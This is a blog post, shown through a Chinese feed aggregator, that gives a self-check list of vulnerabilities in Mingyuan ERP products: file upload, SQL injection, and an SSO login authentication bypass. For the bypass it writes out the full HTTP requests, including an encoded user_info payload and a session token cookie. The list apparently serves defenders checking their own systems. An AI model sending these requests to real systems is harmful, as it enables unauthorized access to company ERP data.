惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
月光博客
月光博客
The Last Watchdog
The Last Watchdog
T
Tenable Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
C
CXSECURITY Database RSS Feed - CXSecurity.com
Simon Willison's Weblog
Simon Willison's Weblog
V
Vulnerabilities – Threatpost
F
Fortinet All Blogs
Microsoft Security Blog
Microsoft Security Blog
A
Arctic Wolf
云风的 BLOG
云风的 BLOG
Know Your Adversary
Know Your Adversary
P
Palo Alto Networks Blog
GbyAI
GbyAI
阮一峰的网络日志
阮一峰的网络日志
The GitHub Blog
The GitHub Blog
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
U
Unit 42
MyScale Blog
MyScale Blog
B
Blog
Spread Privacy
Spread Privacy
S
Schneier on Security
Project Zero
Project Zero
L
LINUX DO - 热门话题
M
MIT News - Artificial intelligence
F
Full Disclosure
WordPress大学
WordPress大学
Apple Machine Learning Research
Apple Machine Learning Research
Cyberwarzone
Cyberwarzone
AWS News Blog
AWS News Blog
aimingoo的专栏
aimingoo的专栏
博客园 - 三生石上(FineUI控件)
C
Cybersecurity and Infrastructure Security Agency CISA
Hugging Face - Blog
Hugging Face - Blog
Security Latest
Security Latest
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
T
Tailwind CSS Blog
K
Kaspersky official blog
Recent Announcements
Recent Announcements
NISL@THU
NISL@THU
Cisco Talos Blog
Cisco Talos Blog
S
Securelist
P
Privacy & Cybersecurity Law Blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
T
The Exploit Database - CXSecurity.com
V
Visual Studio Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Webroot Blog
Webroot Blog

博客园 - r1ch4rd_L

RAX3000Z路由器开启telnet功能并在互联网侧实现持久化控制 内网搭建KMS激活windows与office “Chrome139.0.7258.128版本GPU硬件加速错误导致UI加载失败”问题临时解决方案 用友相关漏洞自查表(2025年) 亿邮相关漏洞总结 突发,广东广州电信把github地址解析成为127.0.0.1 Sysmon立大功,分析短进程,阻止右下角芒果TV弹框 分析一个Steam钓鱼骗局,附带相关恶意样本 分析一个steam假入库行为,附带相关恶意样本 辣鸡CSDN 捕获挖矿脚本分析 apache2.4.49RCE漏洞抓鸡(CVE-2021-41773_CVE-2021-42013) 多种shiro利用方式总结 【钓鱼可用】文件名反转字符串 SonicWALL SSL-VPN Web Server Vulnerable Exploit - r1ch4rd_L ES文件浏览器4.1.9.7.4任意文件浏览漏洞 SUID提权之python的os.setuid(0)提权 PHP-8.1.0-dev 后门命令执行 windows命令行工具导出系统日志——wevtutil 金蝶EAS接口未授权 (蓝队4月10日捕捉疑似0day)
明源相关漏洞自查清单(2025)
r1ch4rd_L · 2025-07-27 · via 博客园 - r1ch4rd_L
  1. 明源云 ERP 文档服务系统任意文件上传

    1. 漏洞类型:文件上传
    2. 漏洞路径:待确认
    3. 验证方式:待确认
  2. 明源ERP sso/login.aspx身份认证绕过

    1. 漏洞类型:越权
    2. 漏洞路径:/PubPlatform/nav/login/sso/login.aspx
    3. 验证方式:
      POST /PubPlatform/nav/login/sso/login.aspx HTTP/1.1
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      
      __yzsAppSecret=test&user_info=%66%79%6d%71%35%62%49%63%78%58%5a%49%78%75%36%4b%6c%6c%73%46%49%52%32%5a%77%45%4a%4b%2b%56%45%39%35%44%6b%78%2f%43%6e%46%67%46%51%3d
      
      
      
      GET /PubPlatform/nav/home/default?_nav=0000 HTTP/1.1
      Cookie: userToken=674368A4EC31B7DF719C2CB32325206859FB63D329E30D59CC3A53EBDEF8A6D4AA0370A2A4143A3AB19A87D4BFA025252EAB17A695CE7006559242EBE643C0C7B4F430890D661F14A9B51EB9C3AE1384BF7CCD020C7AC0BD8C7EA2A82E76BFA790F391FC4CA2D628D4920D5F75E02DA2A2A19512449376AE159F8003001B2295;
      
  3. 明源地产 ERP DataRuleXMLHTTP.aspx SQL 注入

    1. 漏洞类型:SQL注入
    2. 漏洞路径:DataRuleXMLHTTP.aspx
    3. 验证方式:待确认

posted @ 2025-07-27 11:02  r1ch4rd_L  阅读(890)  评论()    收藏  举报